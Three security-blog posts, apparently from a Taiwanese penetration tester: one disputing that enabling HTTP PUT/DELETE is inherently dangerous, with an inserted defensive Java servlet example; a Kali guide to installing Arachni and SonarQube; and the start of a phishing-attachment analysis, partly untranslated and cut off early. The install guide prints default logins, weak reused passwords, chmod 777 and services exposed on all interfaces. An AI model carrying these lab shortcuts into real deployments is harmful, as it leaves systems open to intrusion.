<p><b>Is Enabling the PUT / DELETE Methods on a Web Server Really Dangerous?</b> (published 2023-06-25T08:51:00.005+08:00, updated 2023-06-25T08:51:52.102+08:00)</p>
<div style="border: 3px solid rgb(8, 108, 197); line-height: 150%; padding: 8px;">
<p style="font-family: arial; font-size: 14pt;"><b><span style="color: #990000; font-size: medium;">Preface</span></b></p>
<p style="text-indent: 2em;">RFC 7231 is the reference document for implementing HTTP methods. Section 4 states:</p>
<p style="border: 1pt solid green; padding: 3pt;">HTTP was originally designed to be usable as an interface to distributed object systems. The request method was envisioned as applying semantics to a target resource in much the same way as invoking a defined method on an identified object would apply semantics. </p>
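<p>(HTTP was originally designed to serve as an interface for operating distributed object systems, with the request method treated as the way of operating on the identified object.)</p>
<p>RFC 7231 defines eight HTTP methods in total:</p>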
<table style="border: 1pt solid black;">
<tbody>
<tr>
<th style="border: 1pt solid black;">Method</th>
<th style="border: 1pt solid black;">Description</th>
</tr>
<tr>
<td style="border: 1pt solid black;">GET</td>
<td style="border: 1pt solid black;">Transfers the specified resource (including the response headers and status code)</td>
</tr>
<tr>
<td style="border: 1pt solid black;">HEAD</td>
<td style="border: 1pt solid black;">Like GET, but transfers only the response headers and status code</td>
</tr>
<tr>
<td style="border: 1pt solid black;">POST</td>
<td style="border: 1pt solid black;">Processes the specified resource according to the request payload</td>
</tr>
<tr>
<td style="border: 1pt solid black;">PUT</td>
<td style="border: 1pt solid black;">Replaces the content of the target resource with the request payload (creating the resource if it does not exist)</td>
</tr>
<tr>
<td style="border: 1pt solid black;">DELETE</td>
<td style="border: 1pt solid black;">Removes the current content of the target resource</td>
</tr>
<tr>
<td style="border: 1pt solid black;">CONNECT</td>
<td style="border: 1pt solid black;">Establishes a connection tunnel between the client and the server for the resource being handled</td>
</tr>
<tr>
<td style="border: 1pt solid black;">OPTIONS</td>
<td style="border: 1pt solid black;">Describes the communication options available for the target resource</td>
</tr>
<tr>
<td style="border: 1pt solid black;">TRACE</td>
<td style="border: 1pt solid black;">Performs a message loop-back test along the path to the target resource.</td>
</tr>
</tbody>
</table>
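<p>Methods that do not change the state of a resource are considered "safe", such as GET, HEAD, OPTIONS and TRACE.</p>
<p style="font-family: arial; font-size: 14pt;"><b><span style="color: #990000; font-size: medium;">Background</span></b></p>
<p style="text-indent: 2em;">I have received several penetration test reports stating that <span style="color: #cc0000;">a website with methods such as OPTIONS, PUT and DELETE enabled lets attackers upload backdoors and trojans or delete important files, that this is a high-risk vulnerability, and that the methods must be disabled.</span> Is that really so? I have always had my doubts. Did the penetration testers actually carry out a verification procedure, or did they simply repeat what they had read online? This view may stem from the early Internet, when the target resource took the form of a "file". Today, however, target resources come in many forms; does the original argument that these methods are unsafe still apply?</p>
<p>From the explanation in RFC 7231:</p>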
<p style="border: 1pt solid green; padding: 3pt;">Unlike distributed objects, the standardized request methods in HTTP are not resource-specific, since uniform interfaces provide for better visibility and reuse in network-based systems [REST]. Once defined, a standardized method ought to have the same semantics when applied to any resource, <b><span style="color: #cc0000;">though each resource determines for itself whether those semantics are implemented or allowed.</span></b></p>
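<p>(Unlike distributed objects, the standardized HTTP request methods are not tied to a particular resource, because a uniform interface is easier to understand and reuse in network-based systems (REST). <span style="color: #cc0000;"><b>Each resource may decide for itself whether to implement these methods or allow them to be executed</b></span>, but with standardized methods their meaning is not open to misunderstanding whichever resource they are applied to.)</p><p>Nothing in this passage "requires that PUT/DELETE be used only to operate on files".</p>
<p style="font-family: arial; font-size: 14pt;"><b><span style="color: #990000; font-size: medium;">Action</span></b></p>
<p style="text-indent: 2em;">To find out, I located the <a href="https://github.com/apache/tomcat" target="_blank">Tomcat source code</a> on GitHub and found the logic that handles the PUT and DELETE methods in Tomcat's default DefaultServlet.java; it can indeed upload and delete the specified file. Since the behaviour of PUT and DELETE is defined by Tomcat's default servlet, a developer can redefine these methods too and change how PUT and DELETE are handled. Whether PUT and DELETE are really unsafe therefore has to be verified in practice, so I recorded a video that modifies the PUT and DELETE program logic to show that PUT and DELETE are not as dangerous as penetration testers generally claim!</p>
<p>The video is at: <a data-saferedirecturl="https://www.google.com/url?q=https://youtu.be/x85wiKm3JSg&amp;source=gmail&amp;ust=1687691715169000&amp;usg=AOvVaw0v09qIpHS7YAJMwi6JZYqK" href="https://youtu.be/x85wiKm3JSg" style="background-color: white; color: #1155cc; font-family: Arial, Helvetica, sans-serif; font-size: small;" target="_blank">https://youtu.be/x85wiKm3JSg</a></p>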
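<p>The point made above, that a developer can redefine how PUT and DELETE are handled, shown as an added example (not from the original post, the video or Tomcat): a servlet whose PUT and DELETE act on in-memory objects instead of files. The class name, URL mapping, role name and size limit are assumptions, and the code targets the jakarta.servlet API of Tomcat 10+.</p>

```java
// Added example, not Tomcat code. Assumes a Servlet 5+ container (Tomcat 10+);
// on Tomcat 9 replace the jakarta.* imports with javax.*.
import jakarta.servlet.annotation.WebServlet;
import jakarta.servlet.http.HttpServlet;
import jakarta.servlet.http.HttpServletRequest;
import jakarta.servlet.http.HttpServletResponse;

import java.io.IOException;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;
import java.util.regex.Pattern;

/**
 * PUT and DELETE redefined for an application resource: a "note" held in memory.
 * No request reaches the file system, so enabling these methods on this servlet
 * cannot upload or delete files on the server.
 */
@WebServlet("/notes/*") // hypothetical mapping
public class NoteServlet extends HttpServlet {

    private static final int MAX_BODY_BYTES = 4096; // assumed limit
    // The id is only ever used as a map key; the strict pattern rejects anything else.
    private static final Pattern NOTE_ID = Pattern.compile("[A-Za-z0-9_-]{1,32}");
    // Hypothetical role; it must be defined in the container's security configuration.
    private static final String EDITOR_ROLE = "note-editor";

    private final Map<String, String> notes = new ConcurrentHashMap<>();

    /** Returns the id from /notes/{id}, or null when it is missing or malformed. */
    private static String noteId(HttpServletRequest req) {
        String path = req.getPathInfo();
        if (path == null || path.length() < 2) {
            return null;
        }
        String id = path.substring(1);
        return NOTE_ID.matcher(id).matches() ? id : null;
    }

    /** Gate for state-changing methods: editor role first, then a valid id. */
    private static String authorizedId(HttpServletRequest req, HttpServletResponse resp)
            throws IOException {
        if (!req.isUserInRole(EDITOR_ROLE)) { // also false for unauthenticated callers
            resp.sendError(HttpServletResponse.SC_FORBIDDEN);
            return null;
        }
        String id = noteId(req);
        if (id == null) {
            resp.sendError(HttpServletResponse.SC_BAD_REQUEST);
        }
        return id;
    }

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException {
        String id = noteId(req);
        String body = (id == null) ? null : notes.get(id);
        if (body == null) {
            resp.sendError(HttpServletResponse.SC_NOT_FOUND);
            return;
        }
        resp.setContentType("text/plain"); // never rendered as HTML by the browser
        resp.setCharacterEncoding("UTF-8");
        resp.getWriter().write(body);
    }

    @Override
    protected void doPut(HttpServletRequest req, HttpServletResponse resp) throws IOException {
        String id = authorizedId(req, resp);
        if (id == null) {
            return;
        }
        byte[] body;
        try (InputStream in = req.getInputStream()) {
            body = in.readNBytes(MAX_BODY_BYTES + 1); // read one byte past the limit
        }
        if (body.length > MAX_BODY_BYTES) {
            resp.sendError(HttpServletResponse.SC_REQUEST_ENTITY_TOO_LARGE);
            return;
        }
        String previous = notes.put(id, new String(body, StandardCharsets.UTF_8));
        // PUT semantics: 201 when the resource was created, 204 when it was replaced.
        resp.setStatus(previous == null
                ? HttpServletResponse.SC_CREATED
                : HttpServletResponse.SC_NO_CONTENT);
    }

    @Override
    protected void doDelete(HttpServletRequest req, HttpServletResponse resp) throws IOException {
        String id = authorizedId(req, resp);
        if (id == null) {
            return;
        }
        if (notes.remove(id) == null) {
            resp.sendError(HttpServletResponse.SC_NOT_FOUND);
        } else {
            resp.setStatus(HttpServletResponse.SC_NO_CONTENT);
        }
    }
    // The inherited doOptions() now lists PUT and DELETE in the Allow header. That header
    // is all a scanner sees; what the methods can do is decided by the code above.
}
```

<p>Tomcat's own DefaultServlet only processes PUT and DELETE when its <code>readonly</code> init parameter is set to false; the default is true.</p>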
</div>
<p>雅技資訊技術 (http://www.blogger.com/profile/06948808120337987647)</p>
<p><b>Building Black-Box and White-Box Scanning Systems on KALI Linux (Arachni and SonarQube)</b> (published 2023-03-05T19:48:00.009+08:00, updated 2023-09-28T11:07:26.977+08:00)</p>
<div style="border: 3px solid rgb(8, 108, 197); line-height: 150%; padding: 8px;">
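<p style="font-family: arial; font-size: 14pt;"><b><span style="color: #990000; font-size: medium;">Preface</span></b></p>
<p style="font-family: arial; font-size: 14pt; margin-bottom: 8px; text-indent: 2em;">For a recent security course I needed to introduce free black-box and white-box web scanning tools. Many people online recommend arachni (black-box) and SonarQube (white-box). Because I often use Kali Linux for penetration testing, and Kali ships with a complete third-party environment, I decided to install both tools on Kali.</p>
<p style="font-family: arial; font-size: 14pt; margin-bottom: 8px; text-indent: 2em;">There are plenty of installation and usage guides for arachni and SonarQube online, but when I followed them I hit quite a few pitfalls and walls, so I am recording the process on this blog for future reference.</p>
<p style="font-family: arial; font-size: 14pt;"><b><span style="color: #990000; font-size: medium;">I. The Kali Environment</span></b></p>
<p style="font-family: arial; font-size: 14pt; margin-bottom: 8px; text-indent: 2em;">I downloaded the ready-made, compressed <a href="https://www.kali.org/get-kali/#kali-virtual-machines" target="_blank">VMware virtual machine image</a> directly from Kali-Org, extracted it, and opened it with VMware Workstation Player. This skips installing the virtual machine and simplifies the teaching steps.</p><p style="font-family: arial; font-size: 14pt;">The default account and password of the Kali VM are both "kali". This account is not the system administrator (root), so many commands must be run through sudo, which lets kali act temporarily as the administrator.</p>
<p style="font-family: arial; font-size: 14pt; margin-bottom: 8px; text-indent: 2em;">After logging in to Kali, the first thing to do is update the system. Open a terminal (also called a console) and run <span style="background-color: black;"> <span style="color: #cccccc;">sudo apt update &amp;&amp; sudo apt upgrade -y </span></span> (see the figure below).</p>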
<p style="font-family: arial; font-size: 14pt; margin-bottom: 8px; text-indent: 2em;">Next, run <span style="background-color: black;"> </span><span style="background-color: black; color: #cccccc;">sudo service --status-all | grep post </span> to check whether postgresql is running: a leading [ - ] means it is not running, and [ + ] means it is. If it is not running, use <span style="background-color: black;"><span style="color: #cccccc;"> sudo systemctl enable postgresql </span></span> to have it start automatically at boot, and <span style="background-color: black; color: #cccccc;"> sudo systemctl start postgresql </span> to start the PostgreSQL service right away.</p><p style="font-family: arial; font-size: 14pt;"></p><div class="separator" style="clear: both; font-family: arial; font-size: 14pt; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh1BtuaD_47km2QWazvldu_dKIIeGoUs_nYHwW_9YI7xUUiFio5OzVJB73H0adM3UCFFJ5YTxUlP-u8PfcDgAfiMpQLQQ9qu72hJxlHka0i1_XKopG_yi-RuhESjVcnmSRgC0k9cnB1y3QqDNru482PIApvmzBEU3wMO9yY53iqebdsKbZrBojoVjju8Q" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="440" data-original-width="505" src="https://blogger.googleusercontent.com/img/a/AVvXsEh1BtuaD_47km2QWazvldu_dKIIeGoUs_nYHwW_9YI7xUUiFio5OzVJB73H0adM3UCFFJ5YTxUlP-u8PfcDgAfiMpQLQQ9qu72hJxlHka0i1_XKopG_yi-RuhESjVcnmSRgC0k9cnB1y3QqDNru482PIApvmzBEU3wMO9yY53iqebdsKbZrBojoVjju8Q=s16000" /></a></div></div>
<p style="font-family: arial; font-size: 14pt; margin-bottom: 8px; text-indent: 2em;">Once PostgreSQL is confirmed to be running, you can proceed with the following steps.</p>
<p style="font-family: arial; font-size: 14pt;"><b><span style="color: #990000; font-size: medium;">II. Configuring the PostgreSQL Database</span><span> </span></b><span style="text-indent: 37.3333px;">(see </span><a href="https://medium.com/codex/install-sonarqube-on-ubuntu-21-using-postgresql-e2201fce4bf0" style="text-indent: 37.3333px;" target="_blank">this article</a><span style="text-indent: 37.3333px;">)</span></p>
<p style="font-family: arial; font-size: 14pt; margin-bottom: 8px; text-indent: 2em;">Both arachni and SonarQube support PostgreSQL, and Kali comes with this database system preinstalled, so only a few configuration steps are needed to put it to use.</p>
<p style="font-family: arial; font-size: 14pt; margin-bottom: 8px; text-indent: 2em;">With the PostgreSQL service running, follow this section to create the required database and settings.</p>
<div style="background-color: black; border: 1px solid red; font-family: arial; font-size: 12pt; line-height: 110%; margin: 4px; padding: 0px 4px 0px 12px;">
<p><span style="color: #cccccc;">sudo passwd postgres   </span><span style="color: #04ff00;"># set a new password for postgres (it has none by default)<br />                         # then enter the new password and confirm it; </span><span style="color: #ffa400;">remember the new password</span></p>
<p><span style="color: #cccccc;">su - postgres         </span><span style="color: #04ff00;"> # switch to the postgres user's working environment<br /><span style="color: #cccccc;">密碼: &lt;</span><i style="color: #cccccc;">enter the postgres password</i><span style="color: #cccccc;">&gt;</span></span></p><p><span style="color: #fcff01;">createuser kali</span><span style="color: #cccccc;">        </span><span style="color: #04ff00;"># create a new user in PostgreSQL; the user name is your choice</span></p>
<p><span style="color: #fcff01;">psql   </span><span style="color: #cccccc;">                    </span><span style="color: #04ff00;"># enter the PostgreSQL command-line environment</span></p>
<p><span style="color: #f4cccc;">ALTER USER kali WITH ENCRYPTED password 'kali'; <br />                           </span><span style="color: #04ff00;">-- set a password for kali<br /></span><span style="color: #04ff00;">                           -- 'kali' is reused here for convenience; you can choose another password<br /></span><span style="color: #04ff00;">                           -- this password is separate from the OS password of kali</span></p><p><span style="color: #f4cccc;">CREATE DATABASE sonar WITH ENCODING 'UTF8' OWNER kali TEMPLATE=template0;<br />                          </span><span style="color: #04ff00;">-- create a database named sonar for SonarQube (the white-box tool),<br />                          -- and make kali its owner (the PostgreSQL user created above, not the OS account kali)</span></p>
<p><span style="color: #cccccc;">\q                       </span><span style="color: #04ff00;"># leave the PostgreSQL command-line environment</span></p>
<p><span style="color: #fcff01;">exit</span><span style="color: #cccccc;">                     </span><span style="color: #04ff00;"># leave the postgres administration environment</span></p>
</div>
<p style="font-family: arial; font-size: 14pt;"><br /></p><p style="font-family: arial; font-size: 14pt;"><span><b style="font-size: large;"><span style="color: #990000;">III. Installing arachni</span></b> (see <a href="https://kknews.cc/zh-tw/code/8knvk6n.html" target="_blank">this article</a>)</span></p>
<p style="font-family: arial; font-size: 14pt;">Install arachni in the /opt directory with the following commands:</p>
<div style="background-color: black; border: 1px solid red; font-family: arial; font-size: 12pt; line-height: 110%; margin: 4px; padding: 0px 4px 0px 12px;">
<p style="font-family: arial;"><span style="color: #cccccc;">wget -P /tmp https://github.com/Arachni/arachni/releases/download/v1.6.1.3/arachni-1.6.1.3-0.6.1.1-linux-x86_64.tar.gz </span><span style="color: #04ff00;"># download arachni to the /tmp directory</span></p>
<p style="font-family: arial;"><span style="color: #cccccc;">cd /opt </span><span style="color: #04ff00;"># change to /opt, where arachni will be installed</span></p>
<p style="font-family: arial;"><span style="color: #cccccc;">sudo tar -zxvf /tmp/arachni-1.6.1.3-0.6.1.1-linux-x86_64.tar.gz </span><span style="color: #04ff00;"># extract the archive into /opt</span></p>
<p><span style="color: #cccccc; font-family: arial;">cd arachni-1.6.1.3-0.6.1.1/.system/arachni-ui-web/db/</span><span style="color: #cccccc; font-family: arial;"> </span><span style="color: #04ff00; font-family: arial;"># change to arachni's database directory</span></p><p style="font-family: arial;"><span style="color: #cccccc;">chmod 666 production.sqlite3 </span><span style="color: #04ff00;"># set read/write permissions on the sqlite database used by default</span></p>
</div>
<p style="font-family: arial; font-size: 14pt; text-indent: 2em;">After installation, start the arachni web server with the following commands:</p>
<div style="background-color: black; border: 1px solid red; font-family: arial; font-size: 12pt; line-height: 110%; margin: 4px; padding: 0px 4px 0px 12px;">
<p><span style="color: #cccccc; font-family: arial;">cd /opt/arachni-1.6.1.3-0.6.1.1/bin </span><span style="color: #04ff00;"># change to arachni's bin directory</span></p>
<p style="font-family: arial;"><span style="color: #cccccc;">./arachni_web -o 0.0.0.0 -p 8888 </span><span style="color: #04ff00;"># start arachni</span></p><p style="font-family: arial;"><span style="color: #04ff00;">                    # -o selects the network interface to listen on; 0.0.0.0 means every interface on this machine<br />                    # 8888 is the listening port; a browser can connect to http://VM-IP:8888.</span></p>
</div>
<p style="font-family: arial; font-size: 14pt; margin-bottom: 8px; text-indent: 2em;">After starting the arachni web server, browse to <span style="background-color: #fcff01;"><span style="color: red;">http://127.0.0.1:8888</span></span> from the browser inside Kali. If the login page appears, the installation succeeded. arachni's two default sets of credentials are:</p>
<div style="border: 1px solid gray; font-family: arial; margin: 0px 2em; padding: 0px 2em;"><span style="color: #0b5394;">admin@admin.admin</span> / <span style="color: #990000;">administrator</span><br /><span style="color: #0b5394;">user@user.user</span> / <span style="color: #990000;">regular_user</span></div>
<p style="font-family: arial; font-size: 14pt; text-indent: 2em;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiAPGgvi7uCV4eWHf91PxTt9-wfY1cfQYaUGp91yyvdX9_fTxCtO94X8DEKICzU2Zc3zzg3wo_G-nRilFPLEZ00db5_K5VdENnFBymYIToD1dgQaX8kFy_ioyn26HybjKopYRpmPz9nr8wlaV5WZlK4-hWlunouE0KrdEwmC7lqz-wwfkw1kkAki9QbXg" style="margin-left: 1em; margin-right: 1em;"><img alt="The login page appears, so arachni was installed successfully" data-original-height="560" data-original-width="661" height="339" src="https://blogger.googleusercontent.com/img/a/AVvXsEiAPGgvi7uCV4eWHf91PxTt9-wfY1cfQYaUGp91yyvdX9_fTxCtO94X8DEKICzU2Zc3zzg3wo_G-nRilFPLEZ00db5_K5VdENnFBymYIToD1dgQaX8kFy_ioyn26HybjKopYRpmPz9nr8wlaV5WZlK4-hWlunouE0KrdEwmC7lqz-wwfkw1kkAki9QbXg=w400-h339" width="400" /></a></div><div style="text-align: center;">The login page appears, so arachni was installed successfully</div>
<p style="font-family: arial; font-size: 14pt; text-indent: 2em;">The installation above uses the sqlite3 database bundled with arachni. To store arachni's results in PostgreSQL instead, adjust the setup as follows:</p>
<div style="background-color: black; border: 1px solid red; font-family: arial; font-size: 12pt; line-height: 110%; margin: 4px; padding: 0px 4px 0px 12px;">
<p><span style="color: #cccccc;">cd /opt/arachni-1.6.1.3-0.6.1.1/.system/arachni-ui-web/config/ </span><span style="color: #04ff00;"># change to the config directory</span></p>
<p><span style="color: #cccccc;">sudo mv database.yml database.yml.sqlite3 </span><span style="color: #04ff00;"> # back up the original sqlite3 connection configuration</span></p>
<p><span style="color: #cccccc;">sudo mv database.yml.pgsql database.yml </span><span style="color: #04ff00;"> # enable the postgresql connection configuration</span></p>
<p><span style="color: #cccccc;">cat database.yml    </span><span style="color: #04ff00;"># view the connection configuration</span><br /><span style="color: #cccccc;">                     </span><span style="color: #04ff00;"># note the values of username: </span><span style="color: #ffa400;">arachni</span><span style="color: #04ff00;"> and password: </span><span style="color: #ffa400;">secret</span><span style="color: #04ff00;"> in it</span></p><p><span style="color: #cccccc;">cd ~ </span><span style="color: #04ff00;"> # return to kali's home directory</span></p>
</div>
<p style="font-family: arial; font-size: 14pt; text-indent: 2em;">Next, set up the database for arachni. If you intend arachni to use PostgreSQL from the start, you can perform the following database setup during Part II.</p>
<div style="background-color: black; border: 1px solid red; line-height: 110%; margin: 4px; padding: 0px 4px 0px 12px;">
<p style="font-family: arial; font-size: 12pt;"><span style="color: #cccccc;">su - postgres         </span><span style="color: #04ff00;"> # switch to the postgres user's working environment<br /><span style="color: #cccccc;">密碼: &lt;</span><i style="color: #cccccc;">enter the postgres password</i><span style="color: #cccccc;">&gt;</span></span></p><p style="font-family: arial; font-size: 12pt;"><span style="color: #fcff01;">createuser arachni</span><span style="color: #cccccc;">        </span><span style="color: #04ff00;"># create a new user matching the username value in database.yml</span></p><p style="font-family: arial; font-size: 12pt;"><span style="color: #fcff01;">psql   </span><span style="color: #cccccc;">                    </span><span style="color: #04ff00;"># enter the PostgreSQL command-line environment</span></p><p style="font-family: arial; font-size: 12pt;"><span style="color: #f4cccc;">ALTER USER arachni WITH ENCRYPTED password 'secret'; <br />                           </span><span style="color: #04ff00;">-- set the arachni account's password to match the password in database.yml</span></p><p style="font-size: 12pt;"><span><span style="color: #f4cccc; font-family: arial;">CREATE DATABASE arachni_production WITH ENCODING 'UTF8' OWNER arachni;<br />                          </span><span style="color: #04ff00; font-family: arial;">-- create the </span><span style="color: #ffa400; font-family: arial;">arachni_production</span><span style="color: #04ff00; font-family: arial;"> database and make its owner </span><span style="color: #ffa400; font-family: arial;">arachni</span></span></p><p><span style="color: #ead1dc; font-family: arial;">ALTER USER arachni CREATEDB;   </span><span style="color: #04ff00; font-family: arial;">-- grant arachni permission to create databases</span></p><p style="font-size: 12pt;"><span style="color: #cccccc; font-family: arial; font-size: 12pt;">\q                       </span><span style="color: #04ff00; font-family: arial; font-size: 12pt;"># leave the PostgreSQL command-line environment</span></p><p style="font-family: arial; font-size: 12pt;"><span style="color: #fcff01;">exit</span><span style="color: #cccccc;">                     </span><span style="color: #04ff00;"># leave the postgres administration environment</span></p>
</div>
<p style="font-family: arial; font-size: 14pt;">After configuring the arachni database, you also need to run</p>
<div style="background-color: black; border: 1px solid red; color: #cccccc; font-family: arial; font-size: 12pt; line-height: 140%; padding: 4px;"> cd /opt/arachni-1.6.1.3-0.6.1.1/bin<br /> ./arachni_web_task db:setup </div>
<p style="font-family: arial; font-size: 14pt;">to set up the schema of the arachni_production database.</p>
<p style="font-size: 14pt; text-indent: 2em;"><br /></p>
<p style="font-family: arial; font-size: 14pt;"><span style="color: #990000; font-size: medium;">
<b>IV. Installing SonarQube</b></span></p>
<p style="font-family: arial; font-size: 14pt; text-indent: 2em;">All SonarQube downloads are available <a href="https://www.sonarsource.com/products/sonarqube/downloads/" target="_blank">here</a>. I chose the free Community Edition and installed it in the /opt directory.</p>
<div style="background-color: black; border: 1px solid red; line-height: 110%; margin: 4px; padding: 0px 4px 0px 12px;">
<p style="color: #cccccc; font-family: arial; font-size: 12pt;">wget -P /tmp https://binaries.sonarsource.com/Distribution/sonarqube/sonarqube-9.9.0.65466.zip <span style="color: #04ff00;"># download SonarQube to the /tmp directory</span></p>
<p style="color: #cccccc; font-family: arial; font-size: 12pt;">cd /opt <span style="color: #04ff00;"># change the working directory to /opt</span></p>
<p style="color: #cccccc; font-family: arial; font-size: 12pt;">sudo unzip /tmp/sonarqube-9.9.0.65466.zip <span style="color: #04ff00;"># extract SonarQube</span></p>
<p style="color: #cccccc; font-family: arial; font-size: 12pt;">sudo chown -R kali:kali /opt/sonarqube-9.9.0.65466/* <span style="color: #04ff00;"># change the ownership settings of sonarqube</span></p>
<p style="color: #cccccc; font-family: arial; font-size: 12pt;">sudo chmod 777 -R /opt/sonarqube-9.9.0.65466/temp <span style="color: #04ff00; font-family: arial;"># change the permission settings of temp</span></p>
<p style="color: #cccccc; font-family: arial; font-size: 12pt;">sudo nano /opt/sonarqube-9.9.0.65466/conf/sonar.properties <span style="color: #04ff00;"># edit the sonar configuration file</span></p>
<div style="background-color: #cccccc; color: #660000; font-family: arial; font-size: 12pt; margin: 4px; padding: 4px;">
<p># DATABASE <span style="color: #0b5394;"># database connection settings</span></p>
<p><span style="color: #0b5394;"># user name, see the setup in Part II</span><br />sonar.jdbc.username=kali</p>
<p><span style="color: #0b5394; font-size: 12pt;"># password, see the setup in Part II</span><br />sonar.jdbc.password=kali</p>
<p><span style="color: #0b5394;"># sonar is the database created in Part II</span><br />sonar.jdbc.url=jdbc:postgresql://localhost/sonar</p>
<p># WEB SERVER <span style="color: #0b5394;"># web server settings</span></p>
<p><span style="color: #0b5394;"># network interface that accepts connections; 0.0.0.0 means every IP accepts connections</span><br />sonar.web.host=0.0.0.0</p>
<p><span style="color: #0b5394;"># port that listens for incoming connections</span><br />sonar.web.port=9000</p>
</div>
<p style="color: #cccccc; font-family: arial; font-size: 12pt;"></p>
<p><span style="color: #cccccc; font-family: arial;">/opt/sonarqube-9.9.0.65466/bin/linux-x86-64/sonar.sh console </span><span style="color: #04ff00; font-family: arial;"># start SonarQube</span></p>
</div>
<p style="font-family: arial; font-size: 14pt; text-indent: 2em;">After starting the SonarQube server, browse to <span style="background-color: #fcff01;"><span style="color: red;">http://127.0.0.1:9000</span></span> from the browser inside Kali. If the login page appears, the installation succeeded.</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjaN6bbl7vTjPwSBEOYho2SXqxhEdeBwvjxkfEcpOgFvlQ-nXOB6W6tt6O8jtXIfWN-f6RvySM9-KyqfIrzmw0fln2RmAAG8jzlQ_fv2U2rMLS-UO9o9tAZ1aZ0o9DoVYw0LQoJBseucGqNnlEslw5yf14h3-JRcdC45BDzEP8OEbx0HV2Pa0LnI1kACA" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="369" data-original-width="660" height="179" src="https://blogger.googleusercontent.com/img/a/AVvXsEjaN6bbl7vTjPwSBEOYho2SXqxhEdeBwvjxkfEcpOgFvlQ-nXOB6W6tt6O8jtXIfWN-f6RvySM9-KyqfIrzmw0fln2RmAAG8jzlQ_fv2U2rMLS-UO9o9tAZ1aZ0o9DoVYw0LQoJBseucGqNnlEslw5yf14h3-JRcdC45BDzEP8OEbx0HV2Pa0LnI1kACA" width="320" /></a></div><div style="text-align: center;">The login page appears, so SonarQube was installed successfully</div>
<p style="font-family: arial; font-size: 14pt;">This completes the installation of Arachni and SonarQube. I will cover the basic usage of both tools when time permits.</p>
<hr style="border: 2px solid blue;" />
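<p style="font-family: arial; font-size: 14pt; margin-left: 2em; text-indent: -2em;"><b><span style="color: #cc0000;">Note:</span></b> Installing everything from scratch means installing Java, PostgreSQL and Ruby one by one. Using the ready-made Kali VM lets you concentrate on installing arachni and SonarQube, spares a lot of debugging, and greatly raises the odds of success.</p>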
<hr style="border: 2px solid blue;" />
<p style="margin: 0px;">White-box scanning examples:</p>
<p style="margin-left: 2em; margin-top: 0px;"><a href="https://atic-tw.blogspot.com/2023/09/sonarqubedotnet-core.html" target="_blank">Scanning dotNet Core project source code</a><br /><a href="https://atic-tw.blogspot.com/2023/09/sonarqubenetframework.html">
Scanning .netFramework project source code</a><br /><a href="https://atic-tw.blogspot.com/2023/09/sonarqube-maven.html" target="_blank">Scanning maven project source code</a></p>
</div>
<p>雅技資訊技術 (http://www.blogger.com/profile/06948808120337987647)</p>
<p><b>Investigating a Social Engineering Incident</b> (published 2022-05-15T11:55:00.005+08:00, updated 2022-05-19T13:34:06.506+08:00)</p>
<div style="border: 3px solid rgb(8, 108, 197); line-height: 150%; padding: 8px;">
<p style="font-size: 14pt; margin-bottom: 8px; text-indent: 2em;">
參與滲透測試小組好幾年了,第一次遇到真正的社交工程攻擊。</p>
<p style="font-size: 14pt; margin-bottom: 8px; text-indent: 2em;">前天(<span style="font-family: arial;">2022/05/13</span>)甫上班,同事就來電說他被釣魚了,叫我幫忙分析郵件裡的載荷。這位同事很機警,並沒有打開郵件,而是直接將它存成 <span style="font-family: arial;">.msg</span>(<span style="font-family: arial;">outlook</span>格式的郵件檔),我用<span style="font-family: arial;">Outlook</span>的純文字模式開啟此封郵件,裡頭有一支<span style="font-family: arial;">Excel</span>檔(<span style="font-family: arial;">.xls</span>)。一下載此<span style="font-family: arial;">xls</span>就被防載軟體砍掉,覺得有必要看看它有什麼機關?</p>
<p style="font-size: 14pt; margin-bottom: 8px; text-indent: 2em;">Opening this <span style="font-family: arial;">xls</span> in <span style="font-family: arial;">Excel</span> raises the <span style="color: #cc0000;">security warning that macros have been disabled</span> (Figure 1), which means the file contains macros. I instinctively switched to the <span style="font-family: arial;">VBScript</span> editor, but found no macros there and was not asked for a protection password, which left me puzzled. I remembered that my teacher <span style="color: #351c75;"><u>林易澍</u></span> had taught that "<span style="color: #38761d; font-family: arial;">OfficeMalScanner</span>" can extract protected macros, but its result was "<span style="color: #cc0000; font-family: arial;">No VB-Marco code found!</span>" (Figure 2).</p>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgddQYYevMjDJSj4LxU_I0kAo9fIkP8NU57lsZ3qkc25nMsCZMIrGhkM1oXZeFxbBddJzggiwb1saTmoUuEu6FuKq5yxlxdasj3KYUrzE3GHePTCvgkECm7_And-o8_9dWFcm50w4Gz_uk_ByXPPQk0JzUIj-NBdkLpPBdm7ipJ_KcC9LEqVqm-TSR-ZQ/s887/pic01.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="341" data-original-width="887" height="154" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgddQYYevMjDJSj4LxU_I0kAo9fIkP8NU57lsZ3qkc25nMsCZMIrGhkM1oXZeFxbBddJzggiwb1saTmoUuEu6FuKq5yxlxdasj3KYUrzE3GHePTCvgkECm7_And-o8_9dWFcm50w4Gz_uk_ByXPPQk0JzUIj-NBdkLpPBdm7ipJ_KcC9LEqVqm-TSR-ZQ/w400-h154/pic01.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Figure 1: The security warning appears</td></tr></tbody></table><br />
